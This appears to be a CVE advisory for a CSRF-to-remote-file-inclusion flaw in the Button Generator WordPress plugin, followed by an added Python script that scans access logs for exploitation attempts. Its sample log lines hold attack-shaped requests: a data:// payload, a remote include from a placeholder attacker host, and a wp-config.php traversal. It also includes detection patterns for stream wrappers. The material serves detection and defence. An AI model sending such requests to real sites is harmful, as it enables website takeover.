CVE-2021-25052
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
In short
The Button Generator WordPress plugin before version 2.3.3 has a security flaw that allows attackers to trick administrators into loading and executing malicious PHP files from the internet, potentially taking over the website.
Technical detail
CWE-352 (CSRF) combined with a remote file inclusion vulnerability in the plugin's admin menu page. An attacker can craft a malicious request that, when visited by an authenticated administrator, causes the plugin to include and execute arbitrary PHP files via data://, http://, or direct file paths. Requires admin interaction but results in remote code execution with WordPress privileges.
Summary generated and translated by AI from the official description.
The Button Generator WordPress plugin before 2.3.3, within the wow-company admin menu page, allows include() of an arbitrary file with a PHP extension (as well as via the data:// or http:// protocols), thus leading to CSRF RCE.
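The advisory gives the shape of the malicious request (an admin-page URL carrying a stream wrapper, a remote URL or a local path that the plugin then passes to include()), which is enough to write a retrospective check over web-server access logs. The following Python scanner is an added example, not code from the advisory, the plugin or WPScan. The menu slug wow-company is taken from the advisory; the parameter name tab, the IP addresses, the hosts and the log lines themselves are constructed for the example, and the site origin passed to scan_log is an assumption the caller supplies. The data:// payload is the base64 of the word PLACEHOLDER.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Nginx combined log format (not from the page).
# "wow-company" is the menu slug named in the advisory; "tab" is an assumed
# parameter name, and attacker.invalid is a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=wow-company HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:10:00:07 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=data://text/plain;base64,UExBQ0VIT0xERVI= HTTP/1.1" 200 220 "http://attacker.invalid/" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:10:00:09 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=http://attacker.invalid/x.txt HTTP/1.1" 200 220 "http://attacker.invalid/" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2022:10:00:12 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=..%2F..%2Fwp-config.php HTTP/1.1" 200 220 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2022:10:00:15 +0000] "GET /wp-admin/admin.php?page=wow-company&tab=settings HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# PHP stream wrappers that make include() read something other than a local file
# under the plugin directory (data:// and http:// are the two named in the advisory).
WRAPPER_RE = re.compile(r'^(?:data|php|https?|ftps?|phar|glob|expect|zip|compress\.\w+):', re.I)
# "../" or "..\" anywhere in the value: a local file outside the intended directory.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def query_params(target: str):
    """Split a request target into its path and decoded (name, value) pairs.

    Done by hand rather than with parse_qsl, whose default separator handling
    (';' as well as '&') differs across Python versions and would split the
    data:// payload in two."""
    path, _, query = target.partition('?')
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        name, _, value = chunk.partition('=')
        pairs.append((unquote(name), unquote(value)))
    return path, pairs


def classify_value(value: str):
    """Return why a parameter value looks like an include() target, or None."""
    if WRAPPER_RE.match(value):
        return 'stream wrapper'
    if TRAVERSAL_RE.search(value):
        return 'path traversal'
    if value.lower().endswith('.php'):
        return 'php file reference'
    return None


def scan_log(text: str, own_origin: str = 'http://site.invalid'):
    """Return one finding per suspicious parameter on requests under /wp-admin/.

    own_origin is the site's own scheme+host (an assumed value here); any other
    non-empty Referer on an admin request is consistent with the CSRF delivery
    the advisory describes, so it is recorded alongside the finding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = query_params(m['target'])
        if not path.startswith('/wp-admin/'):
            continue
        referer = m['referer']
        offsite = referer not in ('-', '') and not referer.startswith(own_origin)
        for name, value in params:
            if name == 'page':  # WordPress menu slug, not a file path
                continue
            reason = classify_value(value)
            if reason is None:
                continue
            findings.append({
                'ip': m['ip'], 'ts': m['ts'], 'status': int(m['status']),
                'param': name, 'value': value, 'reason': reason,
                'offsite_referer': offsite,
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r} "
              f"[{f['reason']}; off-site referer: {f['offsite_referer']}]")
```

A hit on the stream-wrapper or traversal rule from an IP that also holds an administrator session is the pattern to escalate; the `.php` suffix rule is a weaker heuristic and is worth reviewing against the plugin's legitimate admin tabs before alerting on it. Because the request is delivered through the administrator's browser, the client IP in the log is the administrator's, so the off-site Referer (when the browser sends one) is often the only trace of where the request originated.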
Affected products
Unknown · Button Generator – easily Button Builder